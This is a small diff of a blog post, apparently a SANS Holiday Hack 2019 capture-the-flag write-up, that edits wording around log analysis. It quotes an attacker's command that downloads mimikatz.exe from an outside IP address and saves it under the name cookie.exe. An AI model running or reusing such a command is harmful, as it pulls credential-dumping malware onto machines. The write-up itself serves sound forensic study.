parsiya/parsiya.net/content/post/2020-01-15-sans-holiday-hack-2019/index.markdown

 -OutFile cookie.zip "
 ```

 Searching for `mimikatz` we find another event.
-It say the original file name of
+It says the original filename of
 `cookie.exe` was `mimikatz`.
-Seems like it was renamed sometime.
+It was renamed.

 `C:\Windows\system32\cmd.exe /c "Invoke-WebRequest -Uri http://192.168.247.175/mimikatz.exe -OutFile C:\cookie.exe "`